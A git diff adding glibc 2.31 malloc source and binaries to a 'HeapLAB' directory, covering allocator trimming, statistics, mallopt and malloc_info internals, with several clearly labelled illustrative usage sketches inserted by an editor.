+              {
+                /* See whether the chunk contains at least one unused page.  */
+                char *paligned_mem = (char *) (((uintptr_t) p
+                                                + sizeof (struct malloc_chunk)
+                                                + psm1) & ~psm1);
+
+                assert ((char *) chunk2mem (p) + 4 * SIZE_SZ <= paligned_mem);
+                assert ((char *) p + size > paligned_mem);
+
+                /* This is the size we could potentially free.  */
+                size -= paligned_mem - (char *) p;
+
+                if (size > psm1)
+                  {
+#if MALLOC_DEBUG
+                    /* When debugging we simulate destroying the memory
+                       content.  */
+                    memset (paligned_mem, 0x89, size & ~psm1);
+#endif
+                    __madvise (paligned_mem, size & ~psm1, MADV_DONTNEED);
+
+                    result = 1;
+                  }
+              }
+          }
+      }
+
+#ifndef MORECORE_CANNOT_TRIM
+  return result | (av == &main_arena ? systrim (pad, av) : 0);
+
+#else
+  return result;
+#endif
+}
+
+
+int
+__malloc_trim (size_t s)
+{
+  int result = 0;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  mstate ar_ptr = &main_arena;
+  do
+    {
+      __libc_lock_lock (ar_ptr->mutex);
+      result |= mtrim (ar_ptr, s);
+      __libc_lock_unlock (ar_ptr->mutex);
+
+      ar_ptr = ar_ptr->next;
+    }
+  while (ar_ptr != &main_arena);
+
+  return result;
+}
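+
+/* [Editor's aside -- illustrative sketch, not part of glibc.]  mtrim ()
+   madvises whole unused pages inside binned chunks and __malloc_trim ()
+   repeats that for every arena (plus systrim () on the main arena).  The
+   public entry point is malloc_trim () from <malloc.h>; the demo below
+   typically prints 1 once there is free space worth returning.  Kept
+   under "#if 0"; build separately.  */
+#if 0
+#include <malloc.h>             /* malloc_trim */
+#include <stdio.h>
+#include <stdlib.h>
+
+int
+main (void)
+{
+  /* Grow the heap, free everything, then ask malloc to hand whole unused
+     pages back to the kernel.  */
+  void *blocks[64];
+  for (int i = 0; i < 64; i++)
+    blocks[i] = malloc (64 * 1024);
+  for (int i = 0; i < 64; i++)
+    free (blocks[i]);
+  printf ("malloc_trim (0) = %d\n", malloc_trim (0));
+  return 0;
+}
+#endif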
+
+
+/*
+   ------------------------- malloc_usable_size -------------------------
+ */
+
+static size_t
+musable (void *mem)
+{
+  mchunkptr p;
+  if (mem != 0)
+    {
+      p = mem2chunk (mem);
+
+      if (__builtin_expect (using_malloc_checking == 1, 0))
+        return malloc_check_get_size (p);
+
+      if (chunk_is_mmapped (p))
+	{
+	  if (DUMPED_MAIN_ARENA_CHUNK (p))
+	    return chunksize (p) - SIZE_SZ;
+	  else
+	    return chunksize (p) - 2 * SIZE_SZ;
+	}
+      else if (inuse (p))
+        return chunksize (p) - SIZE_SZ;
+    }
+  return 0;
+}
+
+
+size_t
+__malloc_usable_size (void *m)
+{
+  size_t result;
+
+  result = musable (m);
+  return result;
+}
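+
+/* [Editor's aside -- illustrative sketch, not part of glibc.]  For an
+   in-use, non-mmapped chunk, musable () above returns chunksize - SIZE_SZ,
+   so the usable size is usually a little more than what was requested.
+   The expected numbers below assume x86-64 (SIZE_SZ == 8, 16-byte
+   alignment).  Kept under "#if 0"; build separately.  */
+#if 0
+#include <malloc.h>             /* malloc_usable_size */
+#include <stdio.h>
+#include <stdlib.h>
+
+int
+main (void)
+{
+  void *a = malloc (24);        /* 0x20 chunk -> usable 24 */
+  void *b = malloc (25);        /* 0x30 chunk -> usable 40 */
+  printf ("malloc(24) usable = %zu\n", malloc_usable_size (a));
+  printf ("malloc(25) usable = %zu\n", malloc_usable_size (b));
+  free (a);
+  free (b);
+  return 0;
+}
+#endif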
+
+/*
+   ------------------------------ mallinfo ------------------------------
+   Accumulate malloc statistics for arena AV into M.
+ */
+
+static void
+int_mallinfo (mstate av, struct mallinfo *m)
+{
+  size_t i;
+  mbinptr b;
+  mchunkptr p;
+  INTERNAL_SIZE_T avail;
+  INTERNAL_SIZE_T fastavail;
+  int nblocks;
+  int nfastblocks;
+
+  check_malloc_state (av);
+
+  /* Account for top */
+  avail = chunksize (av->top);
+  nblocks = 1;  /* top always exists */
+
+  /* traverse fastbins */
+  nfastblocks = 0;
+  fastavail = 0;
+
+  for (i = 0; i < NFASTBINS; ++i)
+    {
+      for (p = fastbin (av, i); p != 0; p = p->fd)
+        {
+          ++nfastblocks;
+          fastavail += chunksize (p);
+        }
+    }
+
+  avail += fastavail;
+
+  /* traverse regular bins */
+  for (i = 1; i < NBINS; ++i)
+    {
+      b = bin_at (av, i);
+      for (p = last (b); p != b; p = p->bk)
+        {
+          ++nblocks;
+          avail += chunksize (p);
+        }
+    }
+
+  m->smblks += nfastblocks;
+  m->ordblks += nblocks;
+  m->fordblks += avail;
+  m->uordblks += av->system_mem - avail;
+  m->arena += av->system_mem;
+  m->fsmblks += fastavail;
+  if (av == &main_arena)
+    {
+      m->hblks = mp_.n_mmaps;
+      m->hblkhd = mp_.mmapped_mem;
+      m->usmblks = 0;
+      m->keepcost = chunksize (av->top);
+    }
+}
+
+
+struct mallinfo
+__libc_mallinfo (void)
+{
+  struct mallinfo m;
+  mstate ar_ptr;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  memset (&m, 0, sizeof (m));
+  ar_ptr = &main_arena;
+  do
+    {
+      __libc_lock_lock (ar_ptr->mutex);
+      int_mallinfo (ar_ptr, &m);
+      __libc_lock_unlock (ar_ptr->mutex);
+
+      ar_ptr = ar_ptr->next;
+    }
+  while (ar_ptr != &main_arena);
+
+  return m;
+}
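+
+/* [Editor's aside -- illustrative sketch, not part of glibc.]  A minimal
+   use of the public mallinfo () wrapper for the accounting done above.
+   Note the struct fields are plain int, so the counters can wrap on large
+   heaps.  Kept under "#if 0"; build separately.  */
+#if 0
+#include <malloc.h>             /* struct mallinfo, mallinfo */
+#include <stdio.h>
+#include <stdlib.h>
+
+int
+main (void)
+{
+  void *p = malloc (1000);
+  struct mallinfo mi = mallinfo ();
+  printf ("arena    (bytes obtained from the OS) = %d\n", mi.arena);
+  printf ("uordblks (bytes in use)               = %d\n", mi.uordblks);
+  printf ("fordblks (free bytes in bins and top) = %d\n", mi.fordblks);
+  free (p);
+  return 0;
+}
+#endif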
+
+/*
+   ------------------------------ malloc_stats ------------------------------
+ */
+
+void
+__malloc_stats (void)
+{
+  int i;
+  mstate ar_ptr;
+  unsigned int in_use_b = mp_.mmapped_mem, system_b = in_use_b;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+  _IO_flockfile (stderr);
+  int old_flags2 = stderr->_flags2;
+  stderr->_flags2 |= _IO_FLAGS2_NOTCANCEL;
+  for (i = 0, ar_ptr = &main_arena;; i++)
+    {
+      struct mallinfo mi;
+
+      memset (&mi, 0, sizeof (mi));
+      __libc_lock_lock (ar_ptr->mutex);
+      int_mallinfo (ar_ptr, &mi);
+      fprintf (stderr, "Arena %d:\n", i);
+      fprintf (stderr, "system bytes     = %10u\n", (unsigned int) mi.arena);
+      fprintf (stderr, "in use bytes     = %10u\n", (unsigned int) mi.uordblks);
+#if MALLOC_DEBUG > 1
+      if (i > 0)
+        dump_heap (heap_for_ptr (top (ar_ptr)));
+#endif
+      system_b += mi.arena;
+      in_use_b += mi.uordblks;
+      __libc_lock_unlock (ar_ptr->mutex);
+      ar_ptr = ar_ptr->next;
+      if (ar_ptr == &main_arena)
+        break;
+    }
+  fprintf (stderr, "Total (incl. mmap):\n");
+  fprintf (stderr, "system bytes     = %10u\n", system_b);
+  fprintf (stderr, "in use bytes     = %10u\n", in_use_b);
+  fprintf (stderr, "max mmap regions = %10u\n", (unsigned int) mp_.max_n_mmaps);
+  fprintf (stderr, "max mmap bytes   = %10lu\n",
+           (unsigned long) mp_.max_mmapped_mem);
+  stderr->_flags2 = old_flags2;
+  _IO_funlockfile (stderr);
+}
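+
+/* Editor's note: illustrative only (not part of glibc).  malloc_stats() takes
+   no arguments and writes the per-arena report built above to stderr, so a
+   minimal demonstration is simply:
+
+     #include <malloc.h>
+     #include <stdlib.h>
+
+     int main (void)
+     {
+       void *p = malloc (1000);
+       // Prints "Arena 0:", "system bytes", "in use bytes" and the mmap
+       // totals for the whole process.
+       malloc_stats ();
+       free (p);
+       return 0;
+     }
+*/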
+
+
+/*
+   ------------------------------ mallopt ------------------------------
+ */
+static __always_inline int
+do_set_trim_threshold (size_t value)
+{
+  LIBC_PROBE (memory_mallopt_trim_threshold, 3, value, mp_.trim_threshold,
+	      mp_.no_dyn_threshold);
+  mp_.trim_threshold = value;
+  mp_.no_dyn_threshold = 1;
+  return 1;
+}
+
+static __always_inline int
+do_set_top_pad (size_t value)
+{
+  LIBC_PROBE (memory_mallopt_top_pad, 3, value, mp_.top_pad,
+	      mp_.no_dyn_threshold);
+  mp_.top_pad = value;
+  mp_.no_dyn_threshold = 1;
+  return 1;
+}
+
+static __always_inline int
+do_set_mmap_threshold (size_t value)
+{
+  /* Forbid setting the threshold too high.  */
+  if (value <= HEAP_MAX_SIZE / 2)
+    {
+      LIBC_PROBE (memory_mallopt_mmap_threshold, 3, value, mp_.mmap_threshold,
+		  mp_.no_dyn_threshold);
+      mp_.mmap_threshold = value;
+      mp_.no_dyn_threshold = 1;
+      return 1;
+    }
+  return 0;
+}
+
+static __always_inline int
+do_set_mmaps_max (int32_t value)
+{
+  LIBC_PROBE (memory_mallopt_mmap_max, 3, value, mp_.n_mmaps_max,
+	      mp_.no_dyn_threshold);
+  mp_.n_mmaps_max = value;
+  mp_.no_dyn_threshold = 1;
+  return 1;
+}
+
+static __always_inline int
+do_set_mallopt_check (int32_t value)
+{
+  return 1;
+}
+
+static __always_inline int
+do_set_perturb_byte (int32_t value)
+{
+  LIBC_PROBE (memory_mallopt_perturb, 2, value, perturb_byte);
+  perturb_byte = value;
+  return 1;
+}
+
+static __always_inline int
+do_set_arena_test (size_t value)
+{
+  LIBC_PROBE (memory_mallopt_arena_test, 2, value, mp_.arena_test);
+  mp_.arena_test = value;
+  return 1;
+}
+
+static __always_inline int
+do_set_arena_max (size_t value)
+{
+  LIBC_PROBE (memory_mallopt_arena_max, 2, value, mp_.arena_max);
+  mp_.arena_max = value;
+  return 1;
+}
+
+#if USE_TCACHE
+static __always_inline int
+do_set_tcache_max (size_t value)
+{
+  if (value >= 0 && value <= MAX_TCACHE_SIZE)
+    {
+      LIBC_PROBE (memory_tunable_tcache_max_bytes, 2, value, mp_.tcache_max_bytes);
+      mp_.tcache_max_bytes = value;
+      mp_.tcache_bins = csize2tidx (request2size(value)) + 1;
+    }
+  return 1;
+}
+
+static __always_inline int
+do_set_tcache_count (size_t value)
+{
+  if (value <= MAX_TCACHE_COUNT)
+    {
+      LIBC_PROBE (memory_tunable_tcache_count, 2, value, mp_.tcache_count);
+      mp_.tcache_count = value;
+    }
+  return 1;
+}
+
+static __always_inline int
+do_set_tcache_unsorted_limit (size_t value)
+{
+  LIBC_PROBE (memory_tunable_tcache_unsorted_limit, 2, value, mp_.tcache_unsorted_limit);
+  mp_.tcache_unsorted_limit = value;
+  return 1;
+}
+#endif
+
+int
+__libc_mallopt (int param_number, int value)
+{
+  mstate av = &main_arena;
+  int res = 1;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+  __libc_lock_lock (av->mutex);
+
+  LIBC_PROBE (memory_mallopt, 2, param_number, value);
+
+  /* We must consolidate main arena before changing max_fast
+     (see definition of set_max_fast).  */
+  malloc_consolidate (av);
+
+  switch (param_number)
+    {
+    case M_MXFAST:
+      if (value >= 0 && value <= MAX_FAST_SIZE)
+        {
+          LIBC_PROBE (memory_mallopt_mxfast, 2, value, get_max_fast ());
+          set_max_fast (value);
+        }
+      else
+        res = 0;
+      break;
+
+    case M_TRIM_THRESHOLD:
+      do_set_trim_threshold (value);
+      break;
+
+    case M_TOP_PAD:
+      do_set_top_pad (value);
+      break;
+
+    case M_MMAP_THRESHOLD:
+      res = do_set_mmap_threshold (value);
+      break;
+
+    case M_MMAP_MAX:
+      do_set_mmaps_max (value);
+      break;
+
+    case M_CHECK_ACTION:
+      do_set_mallopt_check (value);
+      break;
+
+    case M_PERTURB:
+      do_set_perturb_byte (value);
+      break;
+
+    case M_ARENA_TEST:
+      if (value > 0)
+	do_set_arena_test (value);
+      break;
+
+    case M_ARENA_MAX:
+      if (value > 0)
+	do_set_arena_max (value);
+      break;
+    }
+  __libc_lock_unlock (av->mutex);
+  return res;
+}
+libc_hidden_def (__libc_mallopt)
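+
+/* Editor's note: a hedged usage sketch (not part of glibc) for the mallopt
+   interface implemented above.  Each accepted parameter funnels into one of
+   the do_set_* helpers; the return value is 1 on success and 0 when a value
+   is rejected (e.g. an M_MMAP_THRESHOLD above HEAP_MAX_SIZE / 2).
+
+     #include <malloc.h>
+
+     int main (void)
+     {
+       // Disable fastbins entirely (M_MXFAST accepts 0..MAX_FAST_SIZE).
+       mallopt (M_MXFAST, 0);
+       // Raise the mmap threshold; note this also sets no_dyn_threshold,
+       // switching off the dynamic threshold adjustment described later.
+       if (mallopt (M_MMAP_THRESHOLD, 1024 * 1024) == 0)
+         return 1;
+       return 0;
+     }
+*/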
+
+
+/*
+   -------------------- Alternative MORECORE functions --------------------
+ */
+
+
+/*
+   General Requirements for MORECORE.
+
+   The MORECORE function must have the following properties:
+
+   If MORECORE_CONTIGUOUS is false:
+
+ * MORECORE must allocate in multiples of pagesize. It will
+      only be called with arguments that are multiples of pagesize.
+
+ * MORECORE(0) must return an address that is at least
+      MALLOC_ALIGNMENT aligned. (Page-aligning always suffices.)
+
+   else (i.e. If MORECORE_CONTIGUOUS is true):
+
+ * Consecutive calls to MORECORE with positive arguments
+      return increasing addresses, indicating that space has been
+      contiguously extended.
+
+ * MORECORE need not allocate in multiples of pagesize.
+      Calls to MORECORE need not have args of multiples of pagesize.
+
+ * MORECORE need not page-align.
+
+   In either case:
+
+ * MORECORE may allocate more memory than requested. (Or even less,
+      but this will generally result in a malloc failure.)
+
+ * MORECORE must not allocate memory when given argument zero, but
+      instead return one past the end address of memory from previous
+      nonzero call. This malloc does NOT call MORECORE(0)
+      until at least one call with positive arguments is made, so
+      the initial value returned is not important.
+
+ * Even though consecutive calls to MORECORE need not return contiguous
+      addresses, it must be OK for malloc'ed chunks to span multiple
+      regions in those cases where they do happen to be contiguous.
+
+ * MORECORE need not handle negative arguments -- it may instead
+      just return MORECORE_FAILURE when given negative arguments.
+      Negative arguments are always multiples of pagesize. MORECORE
+      must not misinterpret negative args as large positive unsigned
+      args. You can suppress all such calls from even occurring by defining
+      MORECORE_CANNOT_TRIM.
+
+   There is some variation across systems about the type of the
+   argument to sbrk/MORECORE. If size_t is unsigned, then it cannot
+   actually be size_t, because sbrk supports negative args, so it is
+   normally the signed type of the same width as size_t (sometimes
+   declared as "intptr_t", and sometimes "ptrdiff_t").  It doesn't much
+   matter though. Internally, we use "long" as arguments, which should
+   work across all reasonable possibilities.
+
+   Additionally, if MORECORE ever returns failure for a positive
+   request, then mmap is used as a noncontiguous system allocator. This
+   is a useful backup strategy for systems with holes in address spaces
+   -- in this case sbrk cannot contiguously expand the heap, but mmap
+   may be able to map noncontiguous space.
+
+   If you'd like mmap to ALWAYS be used, you can define MORECORE to be
+   a function that always returns MORECORE_FAILURE.
+
+   If you are using this malloc with something other than sbrk (or its
+   emulation) to supply memory regions, you probably want to set
+   MORECORE_CONTIGUOUS as false.  As an example, here is a custom
+   allocator kindly contributed for pre-OSX macOS.  It uses virtually
+   but not necessarily physically contiguous non-paged memory (locked
+   in, present and won't get swapped out).  You can use it by
+   uncommenting this section, adding some #includes, and setting up the
+   appropriate defines above:
+
+ *#define MORECORE osMoreCore
+ *#define MORECORE_CONTIGUOUS 0
+
+   There is also a shutdown routine that should somehow be called for
+   cleanup upon program exit.
+
+ *#define MAX_POOL_ENTRIES 100
+ *#define MINIMUM_MORECORE_SIZE  (64 * 1024)
+   static int next_os_pool;
+   void *our_os_pools[MAX_POOL_ENTRIES];
+
+   void *osMoreCore(int size)
+   {
+    void *ptr = 0;
+    static void *sbrk_top = 0;
+
+    if (size > 0)
+    {
+      if (size < MINIMUM_MORECORE_SIZE)
+         size = MINIMUM_MORECORE_SIZE;
+      if (CurrentExecutionLevel() == kTaskLevel)
+         ptr = PoolAllocateResident(size + RM_PAGE_SIZE, 0);
+      if (ptr == 0)
+      {
+        return (void *) MORECORE_FAILURE;
+      }
+      // save ptrs so they can be freed during cleanup
+      our_os_pools[next_os_pool] = ptr;
+      next_os_pool++;
+      ptr = (void *) ((((unsigned long) ptr) + RM_PAGE_MASK) & ~RM_PAGE_MASK);
+      sbrk_top = (char *) ptr + size;
+      return ptr;
+    }
+    else if (size < 0)
+    {
+      // we don't currently support shrink behavior
+      return (void *) MORECORE_FAILURE;
+    }
+    else
+    {
+      return sbrk_top;
+    }
+   }
+
+   // cleanup any allocated memory pools
+   // called as last thing before shutting down driver
+
+   void osCleanupMem(void)
+   {
+    void **ptr;
+
+    for (ptr = our_os_pools; ptr < &our_os_pools[MAX_POOL_ENTRIES]; ptr++)
+      if (*ptr)
+      {
+         PoolDeallocate(*ptr);
+         *ptr = 0;
+      }
+   }
+
+ */
+
+
+/* Helper code.  */
+
+extern char **__libc_argv attribute_hidden;
+
+static void
+malloc_printerr (const char *str)
+{
+  __libc_message (do_abort, "%s\n", str);
+  __builtin_unreachable ();
+}
+
+/* We need a wrapper function for one of the additions of POSIX.  */
+int
+__posix_memalign (void **memptr, size_t alignment, size_t size)
+{
+  void *mem;
+
+  /* Test whether the SIZE argument is valid.  It must be a power of
+     two multiple of sizeof (void *).  */
+  if (alignment % sizeof (void *) != 0
+      || !powerof2 (alignment / sizeof (void *))
+      || alignment == 0)
+    return EINVAL;
+
+
+  void *address = RETURN_ADDRESS (0);
+  mem = _mid_memalign (alignment, size, address);
+
+  if (mem != NULL)
+    {
+      *memptr = mem;
+      return 0;
+    }
+
+  return ENOMEM;
+}
+weak_alias (__posix_memalign, posix_memalign)
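+
+/* Editor's note: a caller-side sketch (not part of glibc) of the POSIX
+   contract enforced by __posix_memalign above: the alignment must be a power
+   of two multiple of sizeof (void *), and errors are reported through the
+   return value rather than errno.
+
+     #include <errno.h>
+     #include <stdint.h>
+     #include <stdio.h>
+     #include <stdlib.h>
+
+     int main (void)
+     {
+       void *p = NULL;
+       if (posix_memalign (&p, 64, 1024) != 0)      // 64 is a valid alignment
+         return 1;
+       printf ("aligned: %d\n", (int) ((uintptr_t) p % 64 == 0));
+       free (p);
+       // 24 is a multiple of sizeof (void *) but not a power of two,
+       // so the request is rejected with EINVAL.
+       return posix_memalign (&p, 24, 16) == EINVAL ? 0 : 1;
+     }
+*/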
+
+
+int
+__malloc_info (int options, FILE *fp)
+{
+  /* For now, at least.  */
+  if (options != 0)
+    return EINVAL;
+
+  int n = 0;
+  size_t total_nblocks = 0;
+  size_t total_nfastblocks = 0;
+  size_t total_avail = 0;
+  size_t total_fastavail = 0;
+  size_t total_system = 0;
+  size_t total_max_system = 0;
+  size_t total_aspace = 0;
+  size_t total_aspace_mprotect = 0;
+
+
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  fputs ("<malloc version=\"1\">\n", fp);
+
+  /* Iterate over all arenas currently in use.  */
+  mstate ar_ptr = &main_arena;
+  do
+    {
+      fprintf (fp, "<heap nr=\"%d\">\n<sizes>\n", n++);
+
+      size_t nblocks = 0;
+      size_t nfastblocks = 0;
+      size_t avail = 0;
+      size_t fastavail = 0;
+      struct
+      {
+	size_t from;
+	size_t to;
+	size_t total;
+	size_t count;
+      } sizes[NFASTBINS + NBINS - 1];
+#define nsizes (sizeof (sizes) / sizeof (sizes[0]))
+
+      __libc_lock_lock (ar_ptr->mutex);
+
+      for (size_t i = 0; i < NFASTBINS; ++i)
+	{
+	  mchunkptr p = fastbin (ar_ptr, i);
+	  if (p != NULL)
+	    {
+	      size_t nthissize = 0;
+	      size_t thissize = chunksize (p);
+
+	      while (p != NULL)
+		{
+		  ++nthissize;
+		  p = p->fd;
+		}
+
+	      fastavail += nthissize * thissize;
+	      nfastblocks += nthissize;
+	      sizes[i].from = thissize - (MALLOC_ALIGNMENT - 1);
+	      sizes[i].to = thissize;
+	      sizes[i].count = nthissize;
+	    }
+	  else
+	    sizes[i].from = sizes[i].to = sizes[i].count = 0;
+
+	  sizes[i].total = sizes[i].count * sizes[i].to;
+	}
+
+
+      mbinptr bin;
+      struct malloc_chunk *r;
+
+      for (size_t i = 1; i < NBINS; ++i)
+	{
+	  bin = bin_at (ar_ptr, i);
+	  r = bin->fd;
+	  sizes[NFASTBINS - 1 + i].from = ~((size_t) 0);
+	  sizes[NFASTBINS - 1 + i].to = sizes[NFASTBINS - 1 + i].total
+					  = sizes[NFASTBINS - 1 + i].count = 0;
+
+	  if (r != NULL)
+	    while (r != bin)
+	      {
+		size_t r_size = chunksize_nomask (r);
+		++sizes[NFASTBINS - 1 + i].count;
+		sizes[NFASTBINS - 1 + i].total += r_size;
+		sizes[NFASTBINS - 1 + i].from
+		  = MIN (sizes[NFASTBINS - 1 + i].from, r_size);
+		sizes[NFASTBINS - 1 + i].to = MAX (sizes[NFASTBINS - 1 + i].to,
+						   r_size);
+
+		r = r->fd;
+	      }
+
+	  if (sizes[NFASTBINS - 1 + i].count == 0)
+	    sizes[NFASTBINS - 1 + i].from = 0;
+	  nblocks += sizes[NFASTBINS - 1 + i].count;
+	  avail += sizes[NFASTBINS - 1 + i].total;
+	}
+
+      size_t heap_size = 0;
+      size_t heap_mprotect_size = 0;
+      size_t heap_count = 0;
+      if (ar_ptr != &main_arena)
+	{
+	  /* Iterate over the arena heaps from back to front.  */
+	  heap_info *heap = heap_for_ptr (top (ar_ptr));
+	  do
+	    {
+	      heap_size += heap->size;
+	      heap_mprotect_size += heap->mprotect_size;
+	      heap = heap->prev;
+	      ++heap_count;
+	    }
+	  while (heap != NULL);
+	}
+
+      __libc_lock_unlock (ar_ptr->mutex);
+
+      total_nfastblocks += nfastblocks;
+      total_fastavail += fastavail;
+
+      total_nblocks += nblocks;
+      total_avail += avail;
+
+      for (size_t i = 0; i < nsizes; ++i)
+	if (sizes[i].count != 0 && i != NFASTBINS)
+	  fprintf (fp, "							      \
+  <size from=\"%zu\" to=\"%zu\" total=\"%zu\" count=\"%zu\"/>\n",
+		   sizes[i].from, sizes[i].to, sizes[i].total, sizes[i].count);
+
+      if (sizes[NFASTBINS].count != 0)
+	fprintf (fp, "\
+  <unsorted from=\"%zu\" to=\"%zu\" total=\"%zu\" count=\"%zu\"/>\n",
+		 sizes[NFASTBINS].from, sizes[NFASTBINS].to,
+		 sizes[NFASTBINS].total, sizes[NFASTBINS].count);
+
+      total_system += ar_ptr->system_mem;
+      total_max_system += ar_ptr->max_system_mem;
+
+      fprintf (fp,
+	       "</sizes>\n<total type=\"fast\" count=\"%zu\" size=\"%zu\"/>\n"
+	       "<total type=\"rest\" count=\"%zu\" size=\"%zu\"/>\n"
+	       "<system type=\"current\" size=\"%zu\"/>\n"
+	       "<system type=\"max\" size=\"%zu\"/>\n",
+	       nfastblocks, fastavail, nblocks, avail,
+	       ar_ptr->system_mem, ar_ptr->max_system_mem);
+
+      if (ar_ptr != &main_arena)
+	{
+	  fprintf (fp,
+		   "<aspace type=\"total\" size=\"%zu\"/>\n"
+		   "<aspace type=\"mprotect\" size=\"%zu\"/>\n"
+		   "<aspace type=\"subheaps\" size=\"%zu\"/>\n",
+		   heap_size, heap_mprotect_size, heap_count);
+	  total_aspace += heap_size;
+	  total_aspace_mprotect += heap_mprotect_size;
+	}
+      else
+	{
+	  fprintf (fp,
+		   "<aspace type=\"total\" size=\"%zu\"/>\n"
+		   "<aspace type=\"mprotect\" size=\"%zu\"/>\n",
+		   ar_ptr->system_mem, ar_ptr->system_mem);
+	  total_aspace += ar_ptr->system_mem;
+	  total_aspace_mprotect += ar_ptr->system_mem;
+	}
+
+      fputs ("</heap>\n", fp);
+      ar_ptr = ar_ptr->next;
+    }
+  while (ar_ptr != &main_arena);
+
+  fprintf (fp,
+	   "<total type=\"fast\" count=\"%zu\" size=\"%zu\"/>\n"
+	   "<total type=\"rest\" count=\"%zu\" size=\"%zu\"/>\n"
+	   "<total type=\"mmap\" count=\"%d\" size=\"%zu\"/>\n"
+	   "<system type=\"current\" size=\"%zu\"/>\n"
+	   "<system type=\"max\" size=\"%zu\"/>\n"
+	   "<aspace type=\"total\" size=\"%zu\"/>\n"
+	   "<aspace type=\"mprotect\" size=\"%zu\"/>\n"
+	   "</malloc>\n",
+	   total_nfastblocks, total_fastavail, total_nblocks, total_avail,
+	   mp_.n_mmaps, mp_.mmapped_mem,
+	   total_system, total_max_system,
+	   total_aspace, total_aspace_mprotect);
+
+  return 0;
+}
+weak_alias (__malloc_info, malloc_info)
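+
+/* Editor's note: a small usage sketch (not part of glibc).  malloc_info()
+   emits the XML document assembled above ("<malloc version=\"1\">" ...) to
+   the given stdio stream; per the check at the top of __malloc_info, any
+   nonzero options value is rejected with EINVAL.
+
+     #include <malloc.h>
+     #include <stdio.h>
+     #include <stdlib.h>
+
+     int main (void)
+     {
+       void *p = malloc (4096);
+       if (malloc_info (0, stdout) != 0)
+         return 1;
+       free (p);
+       return 0;
+     }
+*/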
+
+
+strong_alias (__libc_calloc, __calloc) weak_alias (__libc_calloc, calloc)
+strong_alias (__libc_free, __free) strong_alias (__libc_free, free)
+strong_alias (__libc_malloc, __malloc) strong_alias (__libc_malloc, malloc)
+strong_alias (__libc_memalign, __memalign)
+weak_alias (__libc_memalign, memalign)
+strong_alias (__libc_realloc, __realloc) strong_alias (__libc_realloc, realloc)
+strong_alias (__libc_valloc, __valloc) weak_alias (__libc_valloc, valloc)
+strong_alias (__libc_pvalloc, __pvalloc) weak_alias (__libc_pvalloc, pvalloc)
+strong_alias (__libc_mallinfo, __mallinfo)
+weak_alias (__libc_mallinfo, mallinfo)
+strong_alias (__libc_mallopt, __mallopt) weak_alias (__libc_mallopt, mallopt)
+
+weak_alias (__malloc_stats, malloc_stats)
+weak_alias (__malloc_usable_size, malloc_usable_size)
+weak_alias (__malloc_trim, malloc_trim)
+
+#if SHLIB_COMPAT (libc, GLIBC_2_0, GLIBC_2_26)
+compat_symbol (libc, __libc_free, cfree, GLIBC_2_0);
+#endif
+
+/* ------------------------------------------------------------
+   History:
+
+   [see ftp://g.oswego.edu/pub/misc/malloc.c for the history of dlmalloc]
+
+ */
+/*
+ * Local variables:
+ * c-basic-offset: 2
+ * End:
+ */
diff --git a/HeapLAB/.glibc/glibc_2.31/ld-2.31.so b/HeapLAB/.glibc/glibc_2.31/ld-2.31.so
new file mode 100755
index 0000000..2d5c9c2
Binary files /dev/null and b/HeapLAB/.glibc/glibc_2.31/ld-2.31.so differ
diff --git a/HeapLAB/.glibc/glibc_2.31/ld.so.2 b/HeapLAB/.glibc/glibc_2.31/ld.so.2
new file mode 120000
index 0000000..2e1e932
--- /dev/null
+++ b/HeapLAB/.glibc/glibc_2.31/ld.so.2
@@ -0,0 +1 @@
+ld-2.31.so
\ No newline at end of file
diff --git a/HeapLAB/.glibc/glibc_2.31/libc-2.31.so b/HeapLAB/.glibc/glibc_2.31/libc-2.31.so
new file mode 100755
index 0000000..d90c38d
Binary files /dev/null and b/HeapLAB/.glibc/glibc_2.31/libc-2.31.so differ
diff --git a/HeapLAB/.glibc/glibc_2.31/libc.so.6 b/HeapLAB/.glibc/glibc_2.31/libc.so.6
new file mode 120000
index 0000000..524d6c6
--- /dev/null
+++ b/HeapLAB/.glibc/glibc_2.31/libc.so.6
@@ -0,0 +1 @@
+libc-2.31.so
\ No newline at end of file
diff --git a/HeapLAB/.glibc/glibc_2.31/malloc/malloc.c b/HeapLAB/.glibc/glibc_2.31/malloc/malloc.c
new file mode 100644
index 0000000..f7cd29b
--- /dev/null
+++ b/HeapLAB/.glibc/glibc_2.31/malloc/malloc.c
@@ -0,0 +1,5610 @@
+/* Malloc implementation for multiple threads without lock contention.
+   Copyright (C) 1996-2020 Free Software Foundation, Inc.
+   This file is part of the GNU C Library.
+   Contributed by Wolfram Gloger <wg@malloc.de>
+   and Doug Lea <dl@cs.oswego.edu>, 2001.
+
+   The GNU C Library is free software; you can redistribute it and/or
+   modify it under the terms of the GNU Lesser General Public License as
+   published by the Free Software Foundation; either version 2.1 of the
+   License, or (at your option) any later version.
+
+   The GNU C Library is distributed in the hope that it will be useful,
+   but WITHOUT ANY WARRANTY; without even the implied warranty of
+   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
+   Lesser General Public License for more details.
+
+   You should have received a copy of the GNU Lesser General Public
+   License along with the GNU C Library; see the file COPYING.LIB.  If
+   not, see <https://www.gnu.org/licenses/>.  */
+
+/*
+  This is a version (aka ptmalloc2) of malloc/free/realloc written by
+  Doug Lea and adapted to multiple threads/arenas by Wolfram Gloger.
+
+  There have been substantial changes made after the integration into
+  glibc in all parts of the code.  Do not look for much commonality
+  with the ptmalloc2 version.
+
+* Version ptmalloc2-20011215
+  based on:
+  VERSION 2.7.0 Sun Mar 11 14:14:06 2001  Doug Lea  (dl at gee)
+
+* Quickstart
+
+  In order to compile this implementation, a Makefile is provided with
+  the ptmalloc2 distribution, which has pre-defined targets for some
+  popular systems (e.g. "make posix" for Posix threads).  All that is
+  typically required with regard to compiler flags is the selection of
+  the thread package via defining one out of USE_PTHREADS, USE_THR or
+  USE_SPROC.  Check the thread-m.h file for what effects this has.
+  Many/most systems will additionally require USE_TSD_DATA_HACK to be
+  defined, so this is the default for "make posix".
+
+* Why use this malloc?
+
+  This is not the fastest, most space-conserving, most portable, or
+  most tunable malloc ever written. However it is among the fastest
+  while also being among the most space-conserving, portable and tunable.
+  Consistent balance across these factors results in a good general-purpose
+  allocator for malloc-intensive programs.
+
+  The main properties of the algorithms are:
+  * For large (>= 512 bytes) requests, it is a pure best-fit allocator,
+    with ties normally decided via FIFO (i.e. least recently used).
